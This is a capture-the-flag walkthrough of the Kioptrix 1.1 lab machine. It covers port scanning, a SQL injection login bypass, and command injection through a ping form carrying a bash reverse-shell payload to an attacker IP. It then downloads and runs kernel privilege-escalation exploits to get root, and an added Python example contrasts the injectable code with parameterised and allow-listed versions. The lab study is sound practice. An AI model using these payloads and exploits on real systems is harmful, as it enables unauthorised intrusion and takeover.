VulnHub Kioptrix 1.1 notes
Kioptrix 1.1
Be careful already at the point where you set up the virtual machine!
pentest
Service enumeration
# nmap -Pn -p- 10.0.2.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-26 02:40 EDT
Nmap scan report for 10.0.2.15
Host is up (0.000089s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
619/tcp  open  compaq-evm
631/tcp  open  ipp
3306/tcp open  mysql
MAC Address: 08:00:27:D7:C4:EF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 16.23 seconds

# nmap -Pn -p 22,80,111,443,619,631,3306 -sV 10.0.2.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-26 02:42 EDT
Nmap scan report for 10.0.2.15
Host is up (0.00063s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
619/tcp  open  status     1 (RPC #100024)
631/tcp  open  ipp        CUPS 1.1
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 08:00:27:D7:C4:EF (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.99 seconds

# nmap -Pn -p 22,80,111,443,619,631,3306 -A 10.0.2.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-26 02:48 EDT
Nmap scan report for 10.0.2.15
Host is up (0.00052s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
|_ssl-date: 2020-04-26T10:49:26+00:00; +4h00m01s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
619/tcp  open  status     1 (RPC #100024)
631/tcp  open  ipp        CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 08:00:27:D7:C4:EF (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: 4h00m00s

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 10.0.2.15

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.82 seconds
Points of interest
Details
OpenSSH 3.9p1 (protocol 1.99)
?
Apache httpd 2.0.52 (CentOS)
# nikto -h 10.0.2.15 -p 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.2.15
+ Target Hostname:    10.0.2.15
+ Target Port:        80
+ Start Time:         2020-04-26 02:56:32 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2020-04-26 02:57:08 (GMT-4) (36 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Opened the site in Firefox and found a login form.
Entered "a' or '1' = '1' -- " in the user field.
Behind it is a ping-check form. Without a doubt this is OS command injection.
# nc -nlvp 8080
Entered "127.0.0.1;bash -i >& /dev/tcp/10.10.10.3/8080 0>&1" in the form.
Reverse shell reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
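The two forms above fail for the same reason: user input is pasted into a command or query string and then interpreted as syntax. The following Python model is added here as an illustration and is not code from the original post or from the Kioptrix VM (whose application is PHP 4.3.9); the users table, the passwords and the function names are all hypothetical. It shows, with the login payload used above and a shortened stand-in for the ping payload, how concatenation turns input into SQL and shell syntax, and what the parameterised and allow-listed versions do with the same input.

```python
import ipaddress
import sqlite3
import subprocess
from typing import List, Optional

# Constructed sample data: a two-row users table standing in for whatever the
# Kioptrix login form queries (usernames and passwords are hypothetical).
SAMPLE_USERS = [("admin", "hypothetical-admin-pw"), ("john", "hypothetical-john-pw")]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Query built by string concatenation, so user input becomes SQL syntax.
    With the payload from this page the WHERE clause becomes
    username = 'a' or '1' = '1' and the password check is commented out by
    '--', so the first row (admin) is returned without any valid password."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Parameterised query: the values travel separately from the SQL text,
    so quotes and comment markers in the input are data, not syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def ping_command_vulnerable(target: str) -> str:
    """The single string a naive ping form hands to a shell (shell=True here,
    shell_exec() or similar in the real PHP app). Returned rather than executed
    so the effect of a ';' in the input is visible: everything after it runs
    as a second command."""
    return "ping -c 3 " + target


def ping_argv_safe(target: str) -> List[str]:
    """Allow-list validation: the target must parse as an IP address, and the
    command is built as an argv list so no shell ever interprets it.
    Raises ValueError for anything that is not a bare IP address."""
    addr = ipaddress.ip_address(target.strip())
    return ["ping", "-c", "3", str(addr)]


def is_valid_ping_target(target: str) -> bool:
    """Form-validation wrapper around ping_argv_safe."""
    try:
        ping_argv_safe(target)
        return True
    except ValueError:
        return False


def run_ping(target: str) -> int:
    """Execute the validated command without a shell; returns the exit code."""
    return subprocess.run(ping_argv_safe(target), capture_output=True, check=False).returncode


if __name__ == "__main__":
    payload = "a' or '1' = '1' -- "   # the login payload used on this page
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, payload, "x"))  # admin
    print("safe login:      ", login_safe(db, payload, "x"))        # None
    injected = "127.0.0.1; id"         # constructed, shortened stand-in for the form payload
    print("shell string:    ", ping_command_vulnerable(injected))
    print("validates:       ", is_valid_ping_target(injected))      # False
    print("argv:            ", ping_argv_safe("127.0.0.1"))
```

The SQLite in-memory database is only a stand-in for the VM's MySQL; the point is the query construction, which is identical across drivers. Note that `ping_argv_safe` rejects hostnames as well as injection strings, which is the right trade-off for a form whose only legitimate input is an address.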
bash-3.00$ mysql --version
mysql  Ver 14.7 Distrib 4.1.22, for redhat-linux-gnu (i686) using readline 4.3
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
Searching Exploit DB, this one looks promising: https://www.exploit-db.com/exploits/9542
# searchsploit ip_append
------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                                                                                        |  Path
                                                                                                                                                      | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)                 | exploits/linux_x86/local/9542.c
------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
Papers: No Result
root@kali:~/EXattack/Vulunhub/Kiptorix1-1# cp /usr/share/exploitdb/exploits/linux_x86/local/9542.c exploit.c
# python -m SimpleHTTPServer
Transfer this exploit code to the target. Anywhere under /tmp you generally don't have to worry about permissions.
bash-3.00$ wget http://10.10.10.3:8000/exploit.c
--07:57:35--  http://10.10.10.3:8000/exploit.c
           => `exploit.c'
Connecting to 10.10.10.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,643 (2.6K) [text/plain]

    0K ..                                                    100%   18.67 MB/s

07:57:35 (18.67 MB/s) - `exploit.c' saved [2643/2643]

bash-3.00$ gcc exploit.c
exploit.c:109:28: warning: no newline at end of file
Could this exploit code really be defective?
Looking around, some people got it to work and some did not.
Why? There are carriage returns at line 28 and so on, but the line gcc flagged was 109.
What finally worked was this code:
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation | exploits/linux/local/9545.c
Hmm. So the newer one works against the older kernel...?
bash-3.00$ gcc 9545.c -o 9545
9545.c:376:28: warning: no newline at end of file
Added a newline at the end of the last line and tried once more.
bash-3.00$ rm 9545.c
bash-3.00$ wget http://10.10.10.3:8000/9545.c
--09:20:35--  http://10.10.10.3:8000/9545.c
           => `9545.c'
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,787 (9.6K) [text/plain]

    0K .........                                             100%   27.37 MB/s

09:20:35 (27.37 MB/s) - `9545.c' saved [9787/9787]

bash-3.00$ gcc 9545.c -o 9545
bash-3.00$ ./9545
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
mysql
Ran sqlmap against it, but nothing in particular...
CUPS 1.1
Not usable unless a printer is connected!
Lessons learned
The chance that the exploit code itself is flawed is not zero?
Or, for that matter, could the reason be that Kioptrix 1.1 was updated?